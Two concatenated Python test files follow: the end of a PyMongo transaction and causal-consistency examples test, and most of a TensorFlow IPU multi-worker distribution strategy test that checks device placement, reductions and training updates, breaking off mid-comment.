array_filters=[{"i.b": 0}])
class TestTransactionExamples(IntegrationTest):
@classmethod
@client_context.require_connection
def setUpClass(cls):
super(TestTransactionExamples, cls).setUpClass()
cls.client = rs_or_single_client(w="majority")
@client_context.require_transactions
def test_transactions(self):
# Transaction examples
client = self.client
self.addCleanup(client.drop_database, "hr")
self.addCleanup(client.drop_database, "reporting")
employees = client.hr.employees
events = client.reporting.events
employees.insert_one({"employee": 3, "status": "Active"})
events.insert_one(
{"employee": 3, "status": {"new": "Active", "old": None}})
# Start Transactions Intro Example 1
def update_employee_info(session):
employees_coll = session.client.hr.employees
events_coll = session.client.reporting.events
with session.start_transaction(
read_concern=ReadConcern("snapshot"),
write_concern=WriteConcern(w="majority")):
employees_coll.update_one(
{"employee": 3}, {"$set": {"status": "Inactive"}},
session=session)
events_coll.insert_one(
{"employee": 3, "status": {
"new": "Inactive", "old": "Active"}},
session=session)
while True:
try:
# Commit uses write concern set at transaction start.
session.commit_transaction()
print("Transaction committed.")
break
except (ConnectionFailure, OperationFailure) as exc:
# Can retry commit
if exc.has_error_label(
"UnknownTransactionCommitResult"):
print("UnknownTransactionCommitResult, retrying "
"commit operation ...")
continue
else:
print("Error during commit ...")
raise
# End Transactions Intro Example 1
with client.start_session() as session:
update_employee_info(session)
employee = employees.find_one({"employee": 3})
self.assertIsNotNone(employee)
self.assertEqual(employee['status'], 'Inactive')
# Start Transactions Retry Example 1
def run_transaction_with_retry(txn_func, session):
while True:
try:
txn_func(session) # performs transaction
break
except (ConnectionFailure, OperationFailure) as exc:
print("Transaction aborted. Caught exception during "
"transaction.")
# If transient error, retry the whole transaction
if exc.has_error_label("TransientTransactionError"):
print("TransientTransactionError, retrying"
"transaction ...")
continue
else:
raise
# End Transactions Retry Example 1
with client.start_session() as session:
run_transaction_with_retry(update_employee_info, session)
employee = employees.find_one({"employee": 3})
self.assertIsNotNone(employee)
self.assertEqual(employee['status'], 'Inactive')
# Start Transactions Retry Example 2
def commit_with_retry(session):
while True:
try:
# Commit uses write concern set at transaction start.
session.commit_transaction()
print("Transaction committed.")
break
except (ConnectionFailure, OperationFailure) as exc:
# Can retry commit
if exc.has_error_label("UnknownTransactionCommitResult"):
print("UnknownTransactionCommitResult, retrying "
"commit operation ...")
continue
else:
print("Error during commit ...")
raise
# End Transactions Retry Example 2
# Test commit_with_retry from the previous examples
def _insert_employee_retry_commit(session):
with session.start_transaction():
employees.insert_one(
{"employee": 4, "status": "Active"},
session=session)
events.insert_one(
{"employee": 4, "status": {"new": "Active", "old": None}},
session=session)
commit_with_retry(session)
with client.start_session() as session:
run_transaction_with_retry(_insert_employee_retry_commit, session)
employee = employees.find_one({"employee": 4})
self.assertIsNotNone(employee)
self.assertEqual(employee['status'], 'Active')
# Start Transactions Retry Example 3
def run_transaction_with_retry(txn_func, session):
while True:
try:
txn_func(session) # performs transaction
break
except (ConnectionFailure, OperationFailure) as exc:
# If transient error, retry the whole transaction
if exc.has_error_label("TransientTransactionError"):
print("TransientTransactionError, retrying "
"transaction ...")
continue
else:
raise
def commit_with_retry(session):
while True:
try:
# Commit uses write concern set at transaction start.
session.commit_transaction()
print("Transaction committed.")
break
except (ConnectionFailure, OperationFailure) as exc:
# Can retry commit
if exc.has_error_label("UnknownTransactionCommitResult"):
print("UnknownTransactionCommitResult, retrying "
"commit operation ...")
continue
else:
print("Error during commit ...")
raise
# Updates two collections in a transaction.
def update_employee_info(session):
employees_coll = session.client.hr.employees
events_coll = session.client.reporting.events
with session.start_transaction(
read_concern=ReadConcern("snapshot"),
write_concern=WriteConcern(w="majority"),
read_preference=ReadPreference.PRIMARY):
employees_coll.update_one(
{"employee": 3}, {"$set": {"status": "Inactive"}},
session=session)
events_coll.insert_one(
{"employee": 3, "status": {
"new": "Inactive", "old": "Active"}},
session=session)
commit_with_retry(session)
# Start a session.
with client.start_session() as session:
try:
run_transaction_with_retry(update_employee_info, session)
except Exception as exc:
# Do something with error.
raise
# End Transactions Retry Example 3
employee = employees.find_one({"employee": 3})
self.assertIsNotNone(employee)
self.assertEqual(employee['status'], 'Inactive')
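# Editor's note: the retry loops above key off two distinct error labels.
# "TransientTransactionError" means the whole transaction can safely be
# retried from the start; "UnknownTransactionCommitResult" means only the
# commit is safe to retry. Any other error is re-raised to the caller.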
@client_context.require_transactions
def test_transactions_beta(self):
# Transaction beta examples
client = self.client
self.addCleanup(client.drop_database, "test")
db = client.test
shipment = db.create_collection("shipment")
inventory = db.create_collection("inventory")
inventory.insert_one({"sku": "abc123", "qty": 500})
# Start Beta Transaction Example 1
db = client.test
with client.start_session() as s:
with s.start_transaction():
db.inventory.update_one({'sku': 'abc123'},
{'$inc': {'qty': -100}},
session=s)
db.shipment.insert_one({'sku': 'abc123', 'qty': 100},
session=s)
# End Beta Transaction Example 1
# Beta Transaction Example 1 with explicit start, commit, and abort.
with client.start_session() as s:
s.start_transaction()
try:
db.inventory.update_one({'sku': 'abc123'},
{'$inc': {'qty': -100}},
session=s)
db.shipment.insert_one({'sku': 'abc123', 'qty': 100},
session=s)
except Exception:
s.abort_transaction()
raise
s.commit_transaction()
# Start Beta Transaction Example 2
db = client.test
shipment = db.get_collection('shipment',
write_concern=WriteConcern(w='majority'))
# In the following block, the following write concerns are used:
# the update_one and insert_one operations use w = 1,
# the transaction commit/abort uses w = 'majority'.
with client.start_session() as s:
with s.start_transaction(write_concern=WriteConcern(w='majority')):
inventory.update_one({'sku': 'abc123'},
{'$inc': {'qty': -100}},
session=s)
shipment.insert_one({'sku': 'abc123', 'qty': 100}, session=s)
# End Beta Transaction Example 2
# Start Beta Transaction Example 3
def run_transaction(session, txn_callback):
with session.start_transaction():
txn_callback(session)
def run_transaction_with_retry(session, txn_callback):
try:
run_transaction(session, txn_callback)
except (OperationFailure, ConnectionFailure) as exc:
if exc.has_error_label("TransientTransactionError"):
# Retry the entire transaction on temporary transaction
# failures.
run_transaction(session, txn_callback)
else:
raise
def shipment_transaction(session):
inventory.update_one({'sku': 'abc123'}, {'$inc': {'qty': -100}},
session=session)
shipment.insert_one({'sku': 'abc123', 'qty': 100}, session=session)
with client.start_session() as session:
run_transaction_with_retry(session, shipment_transaction)
# End Beta Transaction Example 3
class TestCausalConsistencyExamples(IntegrationTest):
@client_context.require_version_min(3, 6, 0)
@client_context.require_secondaries_count(1)
@client_context.require_no_mmap
def test_causal_consistency(self):
# Causal consistency examples
client = self.client
self.addCleanup(client.drop_database, 'test')
client.test.drop_collection('items')
client.test.items.insert_one({
'sku': "111", 'name': 'Peanuts',
'start': datetime.datetime.today()})
# Start Causal Consistency Example 1
with client.start_session(causal_consistency=True) as s1:
current_date = datetime.datetime.today()
items = client.get_database(
'test', read_concern=ReadConcern('majority'),
write_concern=WriteConcern('majority', wtimeout=1000)).items
items.update_one(
{'sku': "111", 'end': None},
{'$set': {'end': current_date}}, session=s1)
items.insert_one(
{'sku': "nuts-111", 'name': "Pecans",
'start': current_date}, session=s1)
# End Causal Consistency Example 1
# Start Causal Consistency Example 2
with client.start_session(causal_consistency=True) as s2:
s2.advance_cluster_time(s1.cluster_time)
s2.advance_operation_time(s1.operation_time)
items = client.get_database(
'test', read_preference=ReadPreference.SECONDARY,
read_concern=ReadConcern('majority'),
write_concern=WriteConcern('majority', wtimeout=1000)).items
for item in items.find({'end': None}, session=s2):
print(item)
# End Causal Consistency Example 2
if __name__ == "__main__":
unittest.main()
|
ipu_multi_worker_strategy_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import collections
import glob
import json
import multiprocessing
import os
import numpy as np
from tensorflow.compiler.plugin.poplar.tests import test_utils as tu
from tensorflow.compat.v1 import disable_v2_behavior
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import keras
from tensorflow.python.client import session as session_lib
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import cross_device_utils
from tensorflow.python.distribute import distribute_lib
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.distribute import multi_worker_util
from tensorflow.python.distribute.cluster_resolver.cluster_resolver import SimpleClusterResolver
from tensorflow.python.distribute.cluster_resolver.tfconfig_cluster_resolver import TFConfigClusterResolver
from tensorflow.python.distribute.reduce_util import ReduceOp
from tensorflow.python.estimator import estimator_lib
from tensorflow.python.framework import ops
from tensorflow.python.ipu import ipu_compiler
from tensorflow.python.ipu import ipu_estimator
from tensorflow.python.ipu import ipu_infeed_queue
from tensorflow.python.ipu import ipu_outfeed_queue
from tensorflow.python.ipu import ipu_pipeline_estimator
from tensorflow.python.ipu import ipu_run_config
from tensorflow.python.ipu import loops
from tensorflow.python.ipu import scopes
from tensorflow.python.ipu import utils as ipu_utils
from tensorflow.python.ipu.config import IPUConfig
from tensorflow.python.ipu.ipu_multi_worker_strategy import IPUMirroredVariable
from tensorflow.python.ipu.ipu_multi_worker_strategy import IPUMultiWorkerStrategyV1
from tensorflow.python.ipu.ipu_multi_worker_strategy import IPUSyncOnReadVariable
from tensorflow.python.ipu.ops import pipelining_ops
from tensorflow.python.ipu.scopes import ipu_scope
from tensorflow.python.keras.layers.normalization import BatchNormalization
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops.losses import losses
from tensorflow.python.platform import googletest
from tensorflow.python.platform import test
from tensorflow.python.summary import summary_iterator
from tensorflow.python.training import server_lib
from tensorflow.python.training.gradient_descent import GradientDescentOptimizer
from tensorflow.python.training.momentum import MomentumOptimizer
from tensorflow.python.training.monitored_session import MonitoredTrainingSession
disable_v2_behavior()
class IPUMultiWorkerStrategyV1Test(multi_worker_test_base.MultiWorkerTestBase):
"""Tests using multiple threads in the same processes."""
@classmethod
def setUpClass(cls):
cfg = IPUConfig()
cfg.auto_select_ipus = 1
tu.add_hw_ci_connection_options(cfg)
cfg.configure_ipu_system()
cls._num_workers = 2
cls._cluster_spec = multi_worker_test_base.create_in_process_cluster(
num_workers=cls._num_workers, num_ps=0, has_chief=False)
def setUp(self):
# We use a different key_base for each test so that collective keys won't be
# reused.
IPUMultiWorkerStrategyV1._collective_key_base += 100000
super().setUp()
def _create_test_objects(self, task_type, task_id, variables_on_host=True):
sess_config = config_pb2.ConfigProto()
sess_config.allow_soft_placement = False
sess_config.log_device_placement = False
cluster_spec = multi_worker_util.normalize_cluster_spec(self._cluster_spec)
cluster_resolver = SimpleClusterResolver(cluster_spec=cluster_spec,
task_type=task_type,
task_id=task_id)
target = cluster_resolver.master(task_id=task_id,
task_type=task_type,
rpc_layer="grpc")
strategy = IPUMultiWorkerStrategyV1(cluster_resolver,
variables_on_host=variables_on_host)
sess_config = strategy.update_config_proto(sess_config)
return strategy, target, sess_config
def _get_devices(self, task_type, task_id):
cpu_device = "/job:{}/replica:0/task:{}/device:CPU:0".format(
task_type, task_id)
ipu_device = "/job:{}/replica:0/task:{}/device:IPU:0".format(
task_type, task_id)
return cpu_device, ipu_device
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_strategy_first_worker(self):
strategy, _, _ = self._create_test_objects(task_type="worker", task_id=0)
self.assertEqual(2, strategy.num_replicas_in_sync)
self.assertEqual(True, strategy.extended.experimental_between_graph)
self.assertEqual(True, strategy.extended.experimental_should_init)
self.assertEqual(True, strategy.extended.should_checkpoint)
self.assertEqual(True, strategy.extended.should_save_summary)
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_strategy_second_worker(self):
strategy, _, _ = self._create_test_objects(task_type="worker", task_id=1)
self.assertEqual(2, strategy.num_replicas_in_sync)
self.assertEqual(True, strategy.extended.experimental_between_graph)
self.assertEqual(True, strategy.extended.experimental_should_init)
self.assertEqual(False, strategy.extended.should_checkpoint)
self.assertEqual(False, strategy.extended.should_save_summary)
def test_initializer_colocation(self):
strategy, _, _ = self._create_test_objects(task_type="worker", task_id=0)
with strategy.scope():
v = variables.Variable(1.0)
assign_op = v.initializer.control_inputs[0]
# The first input is the variable, the second is the value.
initial_value_op = assign_op.inputs[1].op
# The initial value should be colocated with the CPU.
self.assertEqual(initial_value_op.colocation_groups(), [b'loc:@cpu'])
def _test_variables_on_host(self, task_type, task_id, _num_gpus):
strategy, _, _ = self._create_test_objects(task_type,
task_id,
variables_on_host=True)
cpu_device, ipu_device = self._get_devices(task_type, task_id)
with strategy.scope():
v = variables.Variable(1.0)
self.assertEqual(cpu_device, v.device)
def per_replica_fn():
w = variable_scope.get_variable(name="w", initializer=0.0)
self.assertEqual(cpu_device, w.device)
op = math_ops.abs(w)
self.assertEqual(ipu_device, op.device)
return op
per_replica_op = strategy.run(per_replica_fn)
self.assertEqual(ipu_device, per_replica_op.device)
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_variables_on_host(self):
self._run_between_graph_clients(self._test_variables_on_host,
self._cluster_spec,
num_gpus=0)
def _test_variables_on_ipu(self, task_type, task_id, _num_gpus):
strategy, _, _ = self._create_test_objects(task_type,
task_id,
variables_on_host=False)
_, ipu_device = self._get_devices(task_type, task_id)
with strategy.scope():
v = variables.Variable(1.0)
self.assertEqual(ipu_device, v.device)
def per_replica_fn():
w = variable_scope.get_variable(name="w", initializer=0.0)
self.assertEqual(ipu_device, w.device)
op = math_ops.abs(w)
self.assertEqual(ipu_device, op.device)
return op
per_replica_op = strategy.run(per_replica_fn)
self.assertEqual(ipu_device, per_replica_op.device)
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_variables_on_ipu(self):
self._run_between_graph_clients(self._test_variables_on_ipu,
self._cluster_spec,
num_gpus=0)
def _test_all_reduce(self, task_type, task_id, _num_gpus):
strategy, target, sess_config = self._create_test_objects(
task_type=task_type, task_id=task_id)
variable_device, compute_device = self._get_devices(task_type, task_id)
with strategy.scope():
def per_replica_fn(x):
with ops.device("/device:IPU:0"):
y = x * x
self.assertEqual(compute_device, y.device)
return y
inputs = array_ops.placeholder(dtype=np.float32, shape=())
per_replica_y = strategy.run(per_replica_fn, args=[inputs])
self.assertEqual(compute_device, per_replica_y.device)
sum_y = strategy.reduce(ReduceOp.SUM, per_replica_y, axis=None)
self.assertEqual(variable_device, sum_y.device)
with session_lib.Session(target=target, config=sess_config) as sess:
out = sess.run(sum_y, feed_dict={inputs: task_id + 1})
self.assertEqual(5.0, out) # 1*1 + 2*2
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_all_reduce(self):
self._run_between_graph_clients(self._test_all_reduce,
self._cluster_spec,
num_gpus=0)
def _test_mirrored_variable(self, task_type, task_id, _num_gpus):
strategy, target, sess_config = self._create_test_objects(
task_type=task_type, task_id=task_id)
variable_device, compute_device = self._get_devices(task_type, task_id)
with strategy.scope():
def per_replica_fn():
with ops.device("/device:IPU:0"):
w0 = variable_scope.get_variable(name="w0", initializer=task_id + 1)
self.assertIsInstance(w0, IPUMirroredVariable)
self.assertEqual(variable_device, w0.device)
cached_value = w0.value()
self.assertEqual(compute_device, cached_value.device)
ret = w0 * w0
self.assertEqual(compute_device, ret.device)
return ret
per_replica_ret = strategy.run(per_replica_fn, args=[])
self.assertEqual(compute_device, per_replica_ret.device)
sum_ret = strategy.reduce(ReduceOp.SUM, per_replica_ret, axis=None)
self.assertEqual(variable_device, sum_ret.device)
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(variables.global_variables_initializer())
# Both should have initial value from first worker
self.assertEqual([1.0], sess.run(variables.global_variables()))
self.assertEqual(2.0, sess.run(sum_ret)) # 1*1 + 1*1
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_mirrored_variable(self):
self._run_between_graph_clients(self._test_mirrored_variable,
self._cluster_spec,
num_gpus=0)
def _test_sync_on_read_variable(self, task_type, task_id, _num_gpus):
strategy, target, sess_config = self._create_test_objects(
task_type=task_type, task_id=task_id)
variable_device, compute_device = self._get_devices(task_type, task_id)
with strategy.scope():
def per_replica_fn(x):
with ops.device("/device:IPU:0"):
w0 = variable_scope.get_variable(
name="w0",
initializer=float(task_id + 1),
synchronization=variable_scope.VariableSynchronization.ON_READ,
aggregation=variable_scope.VariableAggregation.MEAN)
self.assertIsInstance(w0, IPUSyncOnReadVariable)
self.assertEqual(compute_device, w0.device)
initializer_tensor = w0.values[0].initializer.inputs[1]
self.assertEqual(variable_device, initializer_tensor.device)
return w0.assign_add(x)
inputs = array_ops.placeholder(dtype=np.float32, shape=())
assign_add_op = strategy.run(per_replica_fn, args=[inputs])
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(variables.global_variables_initializer())
# Both should have initial value from first worker
self.assertEqual([1.0], sess.run(variables.global_variables()))
sess.run(assign_add_op, feed_dict={inputs: task_id + 1})
# mean(1 + 1, 1 + 2) = 2.5
self.assertEqual([2.5], sess.run(variables.global_variables()))
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_sync_on_read_variable(self):
self._run_between_graph_clients(self._test_sync_on_read_variable,
self._cluster_spec,
num_gpus=0)
def _test_train_split_device_host_fn(self, task_type, task_id, _num_gpus):
strategy, target, sess_config = self._create_test_objects(
task_type=task_type, task_id=task_id)
variable_device, compute_device = self._get_devices(task_type, task_id)
with strategy.scope():
learning_rate = 0.5
initial_w = 2.0
optimizer = GradientDescentOptimizer(learning_rate)
def device_step_fn(x):
w = variable_scope.get_variable(name="w", initializer=initial_w)
self.assertEqual(variable_device, w.device)
self.assertEqual(compute_device, w.value().device)
loss = w * x
self.assertEqual(compute_device, loss.device)
with ops.name_scope("compute_gradients"):
grads_and_vars = optimizer.compute_gradients(loss)
grads = [g for (g, _) in grads_and_vars]
return grads, loss
def compiled_device_step_fn(inputs):
with ipu_scope("/device:IPU:0"):
grads, loss = ipu_compiler.compile(device_step_fn, inputs=[inputs])
return grads, loss
def host_step_fn(grads):
with ops.name_scope("apply_gradients"):
grads_and_vars = zip(grads, variables.global_variables())
train_op = optimizer.apply_gradients(grads_and_vars)
self.assertEqual(variable_device, train_op.device)
return train_op
def step_fn(inputs):
grads, loss = compiled_device_step_fn(inputs)
with ops.device("/device:CPU:0"):
train_op = host_step_fn(grads)
return train_op, loss
inputs = array_ops.placeholder(dtype=np.float32, shape=())
train_op, per_replica_loss = strategy.run(step_fn, args=[inputs])
self.assertEqual(compute_device, per_replica_loss.device)
total_loss = strategy.reduce(ReduceOp.SUM, per_replica_loss, axis=None)
self.assertEqual(variable_device, total_loss.device)
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(variables.global_variables_initializer())
# L(x) = num_replicas * w * x
# dL(x)/dw = num_replicas * x
# w := w - learning_rate * num_replicas * x
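      # For example, with num_replicas = 2 and learning_rate = 0.5, the x = 0
      # step leaves w at 2.0 and the x = 1 step moves it to 2.0 - 0.5*2*1 = 1.0.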
num_replicas = strategy.num_replicas_in_sync
reference_w = initial_w
w_tensor = variables.global_variables()[0]
for x in range(10):
self.assertEqual(reference_w, sess.run(w_tensor))
_, loss_val = sess.run([train_op, total_loss], feed_dict={inputs: x})
self.assertEqual(num_replicas * reference_w * x, loss_val)
reference_w -= learning_rate * num_replicas * x
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_train_split_device_host_fn(self):
self._run_between_graph_clients(self._test_train_split_device_host_fn,
self._cluster_spec,
num_gpus=0)
def _test_train_combined_device_host_fn(self, task_type, task_id, _num_gpus):
strategy, target, sess_config = self._create_test_objects(
task_type=task_type, task_id=task_id)
variable_device, compute_device = self._get_devices(task_type, task_id)
with strategy.scope():
learning_rate = 0.5
initial_w = 2.0
optimizer = GradientDescentOptimizer(learning_rate)
def step_fn(x):
with ipu_scope("/device:IPU:0"):
w = variable_scope.get_variable(name="w", initializer=initial_w)
self.assertEqual(variable_device, w.device)
self.assertEqual(compute_device, w.value().device)
loss = w * x
self.assertEqual(compute_device, loss.device)
# optimizer.apply_gradients() is colocated with the variables even
# in ipu_scope, while optimizer.compute_gradients() is not.
train_op = optimizer.minimize(loss)
self.assertEqual(variable_device, train_op.device)
return train_op, loss
inputs = array_ops.placeholder(dtype=np.float32, shape=())
train_op, per_replica_loss = strategy.run(step_fn, args=[inputs])
self.assertEqual(compute_device, per_replica_loss.device)
total_loss = strategy.reduce(ReduceOp.SUM, per_replica_loss, axis=None)
self.assertEqual(variable_device, total_loss.device)
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(variables.global_variables_initializer())
# L(x) = num_replicas * w * x
# dL(x)/dw = num_replicas * x
# w := w - learning_rate * num_replicas * x
num_replicas = strategy.num_replicas_in_sync
reference_w = initial_w
w_tensor = variables.global_variables()[0]
for x in range(10):
self.assertEqual(reference_w, sess.run(w_tensor))
_, loss_val = sess.run([train_op, total_loss], feed_dict={inputs: x})
self.assertEqual(num_replicas * reference_w * x, loss_val)
reference_w -= learning_rate * num_replicas * x
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_train_combined_device_host_fn(self):
self._run_between_graph_clients(self._test_train_combined_device_host_fn,
self._cluster_spec,
num_gpus=0)
def _test_slot_variable_on_host(self, task_type, task_id, _num_gpus):
strategy, target, sess_config = self._create_test_objects(
task_type=task_type, task_id=task_id)
variable_device, _ = self._get_devices(task_type, task_id)
with strategy.scope():
optimizer = MomentumOptimizer(learning_rate=0.5, momentum=0.9)
def step_fn(x):
with ipu_scope("/device:IPU:0"):
w = variable_scope.get_variable(name="w", initializer=1.0)
loss = w * x
train_op = optimizer.minimize(loss)
return train_op, loss
inputs = array_ops.placeholder(dtype=np.float32, shape=())
train_op, per_replica_loss = strategy.run(step_fn, args=[inputs])
total_loss = strategy.reduce(ReduceOp.SUM, per_replica_loss, axis=None)
# Verify device placement of momentum accumulator variable.
self.assertEqual(1, len(optimizer.variables()))
self.assertEqual(variable_device, optimizer.variables()[0].device)
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(variables.global_variables_initializer())
_, loss_val = sess.run([train_op, total_loss], feed_dict={inputs: 1.0})
self.assertEqual(2.0, loss_val)
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_slot_variable_on_host(self):
self._run_between_graph_clients(self._test_slot_variable_on_host,
self._cluster_spec,
num_gpus=0)
def _test_slot_variable_on_ipu(self, task_type, task_id, _num_gpus):
strategy, target, sess_config = self._create_test_objects(
task_type=task_type, task_id=task_id, variables_on_host=False)
_, ipu_device = self._get_devices(task_type, task_id)
with strategy.scope():
optimizer = MomentumOptimizer(learning_rate=0.5, momentum=0.9)
def step_fn(x):
with ipu_scope("/device:IPU:0"):
w = variable_scope.get_variable(name="w", initializer=1.0)
loss = w * x
train_op = optimizer.minimize(loss)
return train_op, loss
inputs = array_ops.placeholder(dtype=np.float32, shape=())
train_op, per_replica_loss = strategy.run(step_fn, args=[inputs])
total_loss = strategy.reduce(ReduceOp.SUM, per_replica_loss, axis=None)
# Verify device placement of momentum accumulator variable.
self.assertEqual(1, len(optimizer.variables()))
self.assertEqual(ipu_device, optimizer.variables()[0].device)
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(variables.global_variables_initializer())
_, loss_val = sess.run([train_op, total_loss], feed_dict={inputs: 1.0})
self.assertEqual(2.0, loss_val)
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_slot_variable_on_ipu(self):
self._run_between_graph_clients(self._test_slot_variable_on_ipu,
self._cluster_spec,
num_gpus=0)
def _test_distribute_dataset(self, task_type, task_id, _num_gpus):
strategy, target, sess_config = self._create_test_objects(
task_type=task_type, task_id=task_id)
with strategy.scope():
def step_fn(x):
with ipu_scope("/device:IPU:0"):
y = x.values[0] * x.values[0]
return y
dataset = dataset_ops.Dataset.range(10)
dataset = dataset.map(lambda x: math_ops.cast(x, np.float32))
dataset = dataset.batch(2, drop_remainder=True) # global batch size
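      # With two workers, the global batch of 2 is split across the replicas,
      # so each replica receives one element per step (x.values[0] above).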
dist_dataset = strategy.experimental_distribute_dataset(dataset)
inputs = dist_dataset.make_initializable_iterator()
per_replica_y = strategy.run(step_fn, args=[next(inputs)])
sum_y = strategy.reduce(ReduceOp.SUM, per_replica_y, axis=None)
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(inputs.initializer)
self.assertEqual(1.0, sess.run(sum_y)) # 0*0 + 1*1
self.assertEqual(13.0, sess.run(sum_y)) # 2*2 + 3*3
self.assertEqual(41.0, sess.run(sum_y)) # 4*4 + 5*5
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_distribute_dataset(self):
self._run_between_graph_clients(self._test_distribute_dataset,
self._cluster_spec,
num_gpus=0)
def _test_monitored_training_session(self, task_type, task_id, _num_gpus):
strategy, target, sess_config = self._create_test_objects(
task_type=task_type, task_id=task_id)
with strategy.scope():
def step_fn(x):
with ipu_scope("/device:IPU:0"):
w = variable_scope.get_variable("w", initializer=2.0)
y = w * x
return y
inputs = array_ops.placeholder(dtype=np.float32, shape=())
per_replica_y = strategy.run(step_fn, args=[inputs])
sum_y = strategy.reduce(ReduceOp.SUM, per_replica_y, axis=None)
with MonitoredTrainingSession(master=target, config=sess_config) as sess:
out = sess.run(sum_y, feed_dict={inputs: task_id + 1})
self.assertEqual(6.0, out) # 2*1 + 2*2
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_monitored_training_session(self):
self._run_between_graph_clients(self._test_monitored_training_session,
self._cluster_spec,
num_gpus=0)
def _test_ipu_estimator_train_with_host_call(self, task_type, task_id,
_num_gpus):
strategy, target, _ = self._create_test_objects(task_type=task_type,
task_id=task_id)
learning_rate = 0.5
initial_w = 2.0
# Use momentum, but set to zero, just to verify that the
# momentum accumulator "slot" does not cause any problems.
optimizer = MomentumOptimizer(learning_rate=learning_rate, momentum=0.0)
def host_model_fn(*grads):
grads_and_vars = zip(grads, variables.trainable_variables())
with ops.name_scope("apply_gradients"):
train_op = optimizer.apply_gradients(grads_and_vars)
return train_op
def my_model_fn(features, labels, mode):
w = variable_scope.get_variable(name="w", initializer=initial_w)
predictions = features * w
loss = losses.mean_squared_error(labels=labels, predictions=predictions)
# Note: According to some comments, this might be subject to change in TF2.
# Remember to update documentation and examples when this happens.
self.assertEqual(ReduceOp.MEAN, distribute_lib.get_loss_reduction())
with ops.name_scope("compute_gradients"):
grads_and_vars = optimizer.compute_gradients(loss)
grads = [g for (g, _) in grads_and_vars]
train_op = array_ops.identity(loss)
host_call = (host_model_fn, grads)
return ipu_estimator.IPUEstimatorSpec(mode=mode,
loss=loss,
train_op=train_op,
host_call=host_call)
features = np.array([[1.0], [2.0]], dtype=np.float32)
labels = np.array([[1.0], [2.0]], dtype=np.float32)
def my_input_fn(input_context):
dataset = dataset_ops.Dataset.from_tensor_slices((features, labels))
dataset = dataset.batch(1, drop_remainder=True).repeat()
num_shards = input_context.num_input_pipelines
shard_index = input_context.input_pipeline_id
self.assertEqual(self._num_workers, num_shards)
self.assertEqual(task_id, shard_index)
dataset = dataset.shard(num_shards=num_shards, index=shard_index)
return dataset
config = ipu_run_config.RunConfig(
session_config=config_pb2.ConfigProto(allow_soft_placement=False),
master=target,
train_distribute=strategy,
)
estimator = ipu_estimator.IPUEstimator(model_fn=my_model_fn, config=config)
reference_w = initial_w
for i in range(3):
estimator.train(my_input_fn, steps=1)
self.assertEqual(i + 1, estimator.get_variable_value("global_step"))
# L(x, y) = 0.5 * ((w * x_0 - y_0)^2 + (w * x_1 - y_1)^2)
# dL(x, y)/dw = (w * x_0 - y_0) * x_0 + (w * x_1 - y_1) * x_1
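      # For example, on the first step: (2*1 - 1)*1 + (2*2 - 2)*2 = 5, so
      # w moves from 2.0 to 2.0 - 0.5 * 5 = -0.5.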
reference_gradient = np.sum((reference_w * features - labels) * features)
reference_w -= learning_rate * reference_gradient
self.assertEqual(reference_w, estimator.get_variable_value("w"))
@tu.test_may_use_ipus_or_model(num_ipus=2)
def test_ipu_estimator_train_with_host_call(self):
self._run_between_graph_clients(
self._test_ipu_estimator_train_with_host_call,
self._cluster_spec,
num_gpus=0)
def _test_batch_normalization(self, task_type, task_id, _num_gpus):
strategy, target, sess_config = self._create_test_objects(
task_type=task_type, task_id=task_id, variables_on_host=True)
variable_device, compute_device = self._get_devices(task_type, task_id)
with strategy.scope():
batch_norm = BatchNormalization(momentum=0.0)
def per_replica_fn(x):
with ops.device("/device:IPU:0"):
y = batch_norm(x, training=True)
self.assertIsInstance(batch_norm.beta, IPUMirroredVariable)
self.assertIsInstance(batch_norm.gamma, IPUMirroredVariable)
self.assertEqual(variable_device, batch_norm.beta.device)
self.assertEqual(variable_device, batch_norm.gamma.device)
self.assertIsInstance(batch_norm.moving_mean, IPUSyncOnReadVariable)
self.assertIsInstance(batch_norm.moving_variance,
IPUSyncOnReadVariable)
self.assertEqual(compute_device, batch_norm.moving_mean.device)
self.assertEqual(compute_device, batch_norm.moving_variance.device)
return y
def compiled_per_replica_fn(inputs):
with ipu_scope("/device:IPU:0"):
[out] = ipu_compiler.compile(per_replica_fn, inputs=[inputs])
return out
inputs = array_ops.placeholder(dtype=np.float32, shape=(2, 1))
per_replica_y = strategy.run(compiled_per_replica_fn, args=[inputs])
sum_y = strategy.reduce(ReduceOp.SUM, per_replica_y, axis=None)
self.assertEqual(variable_device, batch_norm.moving_mean._get().device) # pylint: disable=protected-access
with session_lib.Session(target=target, config=sess_config) as sess:
sess.run(variables.global_variables_initializer())
sess.run(sum_y, feed_dict={inputs: [[2.0 * (task_id + 1)], [0.0]]})
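      # Each task feeds the batch [2 * (task_id + 1), 0.0], whose mean is
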